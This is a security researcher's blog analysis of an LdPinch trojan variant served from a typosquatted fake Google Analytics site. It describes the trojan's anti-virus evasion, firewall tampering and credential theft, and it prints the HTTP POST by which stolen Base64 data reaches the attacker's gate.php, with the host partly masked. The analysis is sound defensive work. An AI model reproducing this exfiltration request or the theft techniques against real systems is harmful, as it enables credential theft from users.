Blog

While techniques are increasing to infect people surfing the Web, classic tricks are still effective. TypoSquatting is still very common, and is used to get users information to malicious Web sites.

Recently, we have had reports of malicious sites using a "Google analytics" domain name, with minor twists (typos) to get traffic and eventually, infect machines.

With old tricks come old malware

The fake Google analytics Web site was hosting a variant of the infamous LdPinch Trojan. Although this threat is well known, the anti-virus coverage was really low. Only the generic packer detection triggered on a few of them. The reason behind this problem is the obfuscation used to protect the malicious code from prying eyes. Under the obfuscation, a very standard sample is used, with features common to most of the LdPinch variants.

The trojan uses threads to look for anti-virus software. It tries to detect any window that could be displayed by the anti-virus software, and close it as soon as it appears on the screen:

It also registers itself to the Windows XP firewall by changing the registry:

The spyware then starts to gather information on the computer on which it is running, including Windows information such as DisplayName, DigitalProductID etc.

The malicious code browses the uninstall information to see what software is installed. It gathers information about the system's current usage of both physical and virtual memory using the GlobalMemoryStatus API function. The malicious code gets the Windows version, the current user and computer names, and starts listing all the logical drives on the computer. For the fixed hard drives, it also logs the amount of free space available.

It then starts logging information related to the hardware, such as CPU information, using the cpuid instruction. (Once with EAX=0 to get Vendor ID, and once with EAX=1 to get Processor Infor and feature Bits.)

The malicious code gets the current host name and language used on the computer, lists all the running processes, Windows and system paths, current directory, temp, startup information, and application data paths. All directories in this folder are logged, in order to learn information about the users on the machine.

The malicious code looks for TheBat, ICQ (99 to 2002 including minor versions), Miranda, Trillian, dial-up connection passwords and log them. It reads the protected storage and logs the information that it finds. TotalCommander, CuteFTP (many versions), FAR manager FTP, WS FTP sites and passwords are also stolen.

The browsers are not excluded. Opera and Mozilla profiles are browsed for sensitive information, along with email clients (Eudora, Outlook), FTP clients (FlashFXP, FileZilla), DownloadManagers (looks for rapidshare, megaupload premium accounts information), Passport .NET credential and much more.

The list of targets is so long that it is not listed here.

Eventually, everything gets encrypted and Base64 encoded, and posted (once the Internet connection is active on the computer) onto the fake Google analytics site, using a PHP file that logs the data server side:

POST on /gate/php:

POST /gate.php HTTP/1.0
Host: google-*****.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1624

a=chee****@mail.ru&b=report&d=report.bin&c=*/BASE64stolendata/*

Classic tricks combined with old malware is still very effective.

Security Researcher: Nicolas Brulez